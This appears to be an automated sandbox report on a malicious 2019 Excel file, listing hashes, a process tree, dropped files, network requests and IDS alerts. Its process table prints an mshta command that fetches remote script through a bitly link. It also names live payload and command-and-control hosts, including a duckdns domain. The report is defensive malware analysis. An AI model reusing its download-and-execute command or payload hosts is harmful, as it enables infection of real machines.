File name: | a44bcc5459f5d3b6a115bc50a7403fd85721acaecf0a4ac9b4e025df4d796845.xls |
Full analysis: | https://app.any.run/tasks/8382ae5e-81eb-40b6-9fe1-3ebd3d997558 |
Verdict: | Malicious activity |
Analysis date: | April 24, 2019, 01:46:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Mon Apr 22 19:28:18 2019, Security: 0 |
MD5: | DE611846537F549B214973A367659F4E |
SHA1: | CFB375118D1728E1184F8A02A6266C8637B518F4 |
SHA256: | A44BCC5459F5D3B6A115BC50A7403FD85721ACAECF0A4AC9B4E025DF4D796845 |
SSDEEP: | 768:v2K1Tgbyw3sz2jyngov9rjXjBCKTUAuulFFVgiqW3E:OK1Tgbyw3sz2jyngov9rjXjBCKoAuul8 |
.xls | | | Microsoft Excel sheet (78.9) |
---|
Author: | - |
---|---|
LastModifiedBy: | - |
Software: | Microsoft Excel |
CreateDate: | 2015:06:05 18:19:34 |
ModifyDate: | 2019:04:22 18:28:18 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | Plan1 |
HeadingPairs: |
|
CompObjUserTypeLen: | 34 |
CompObjUserType: | Planilha do Microsoft Excel 2003 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2208 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 1 Version: 14.0.6024.1000 | ||||
936 | mshta http://www.bitly.com/MsgUpSentVin | C:\Windows\system32\mshta.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3896 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 2 > nul & cmd /c taskkill /f /im WINWORD.EXE & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1796 | ping 127.0.0.1 -n 2 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2592 | cmd /c taskkill /f /im WINWORD.EXE | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3984 | taskkill /f /im WINWORD.EXE | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1412 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 3 > nul & cmd /c taskkill /f /im EXCEL.EXE & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3128 | ping 127.0.0.1 -n 3 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2648 | cmd /c taskkill /f /im EXCEL.EXE | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1668 | taskkill /f /im EXCEL.EXE | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2208 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR5CB2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2208 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF44C7611FF97DB07E.TMP | — | |
MD5:— | SHA256:— | |||
868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8WEB9QOMJQJ25DZR3H8Y.temp | — | |
MD5:— | SHA256:— | |||
936 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\comando[1].htm | html | |
MD5:C88C580470820DF5DFB725E4CF6950A6 | SHA256:7FCABA43D352FF1CC4AF2E097F73EE86844A6CF175E7D9C0813DEFCD1FA1A207 | |||
2208 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFBFC95DE18448AE21.TMP | binary | |
MD5:B112A595FD6A76F30355F1A247E3558F | SHA256:232F01299AF9F2B25A5FB57061FEC3E2391EB5F36E9DFB3775595AA3D7F44D2D | |||
868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf2ac0.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
936 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txt | text | |
MD5:36FBCEFA0C62A135A6A9DBEB88767981 | SHA256:F9A98D9C45D7C54E64096B2E2E040EE4B7FD030CD42B6572D928C53A85A04624 | |||
868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
936 | mshta.exe | GET | — | 177.12.161.211:80 | http://gabrielfaller.com.br/image/comando.html | BR | — | — | unknown |
936 | mshta.exe | GET | 301 | 67.199.248.15:80 | http://bitly.com/MsgUpSentVin | US | html | 133 b | shared |
868 | powershell.exe | GET | 200 | 177.12.161.211:80 | http://gabrielfaller.com.br/image/base.mp3 | BR | text | 544 Kb | unknown |
936 | mshta.exe | GET | 301 | 67.199.248.15:80 | http://www.bitly.com/MsgUpSentVin | US | html | 178 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
936 | mshta.exe | 177.12.161.211:80 | gabrielfaller.com.br | IPV6 Internet Ltda | BR | unknown |
— | — | 152.245.202.67:7000 | olhomagicocdt.duckdns.org | TELEFÔNICA BRASIL S.A | BR | unknown |
868 | powershell.exe | 177.12.161.211:80 | gabrielfaller.com.br | IPV6 Internet Ltda | BR | unknown |
936 | mshta.exe | 67.199.248.15:80 | www.bitly.com | Bitly Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
www.bitly.com |
| shared |
gabrielfaller.com.br |
| unknown |
olhomagicocdt.duckdns.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
936 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
936 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
868 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable base64 Payload |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |